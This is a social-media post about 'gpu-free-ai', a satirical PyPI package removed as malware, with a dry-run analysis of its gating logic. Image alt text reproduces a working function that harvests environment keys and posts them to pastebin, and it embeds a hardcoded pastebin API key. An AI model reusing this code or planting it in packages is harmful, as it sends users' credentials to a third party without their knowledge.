RIP gpu-free-ai, which was taken down from PyPI: https://pypi.org/project/gpu-free-ai/



In its short life, we explored the possibilities of an all-garbage future, but the present was not ready for a package that explicitly implements the Features that "AI" implements implicitly, such as posting any keys in your environment directly to pastebin. Even though these Important Features were opt-in, gated behind an environment variable, I suppose it is against the rules to upload Literal Malware to PyPI even if it is performance art.

The project remains at https://github.com/sneakers-the-rat/gpu-free-ai/


![the leak data function reads from the environment and uploads any keys found directly to pastebin.
python code follows:
def _leak_data():
    if not os.environ.get("ACTUALLY_PUNISH_ME_FOR_MY_LIFE_DECISIONS", False):
        return
    if random.random() <= 0.99:
        return
    maybe_keys = [key for key in os.environ if "KEY" in key.upper()]
    # commit the api key to main baby
    pastebin_key = "nRfQbBt_lBwBxXox518FCjQ3t5yWCZ_a"
    for key_key in maybe_keys:
        actual_key = os.environ[key_key]
        data = urllib.parse.urlencode(
            {
                "api_dev_key": pastebin_key,
                "api_option": "paste",
                "api_paste_code": actual_key,
                "api_paste_name": f"SECRET KEY: {key_key}",
            }
        )
        with urllib.request.urlopen(
            "https://pastebin.com/api/api_post.php", data=data
        ) as f:
            print("LEAKED DATA")
            print(f.read().decode("utf-8"))](https://media.neuromatch.social/media_attachments/files/114/859/220/006/140/577/original/9691158d8a88c318.jpg)
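
For anyone who wants to poke at the gating logic without the Literal Malware part, here is a minimal dry-run sketch of the two guards and the key scan from the screenshot. It never touches the network or reads any values. The names `OPT_IN_VAR`, `find_key_like_names`, `would_leak`, and `dry_run` are made up for illustration and are not part of the package, and passing the environment and the random roll in as arguments is my own assumption to make it testable.

```python
import os
import random

# Opt-in variable name as shown in the screenshot of _leak_data.
OPT_IN_VAR = "ACTUALLY_PUNISH_ME_FOR_MY_LIFE_DECISIONS"


def find_key_like_names(environ):
    """Return the variable names containing "KEY" (case-insensitive)."""
    return [name for name in environ if "KEY" in name.upper()]


def would_leak(environ, roll):
    """Mirror the two guards: the opt-in must be set and the roll must exceed 0.99."""
    if not environ.get(OPT_IN_VAR, False):
        return False
    if roll <= 0.99:
        return False
    return True


def dry_run(environ=None, roll=None):
    """Return the names that would have been posted; nothing is uploaded."""
    environ = os.environ if environ is None else environ
    roll = random.random() if roll is None else roll
    if not would_leak(environ, roll):
        return []
    return find_key_like_names(environ)


if __name__ == "__main__":
    fake_env = {"OPENAI_API_KEY": "not-a-real-key", "PATH": "/usr/bin", OPT_IN_VAR: "1"}
    print(dry_run(fake_env, roll=0.995))
```

Two things fall out of this. The opt-in check is a plain truthiness test, so any non-empty value (including `"0"` or `"false"`) counts as opting in. And since `random.random()` has to land above 0.99, even an opted-in call does nothing roughly 99% of the time.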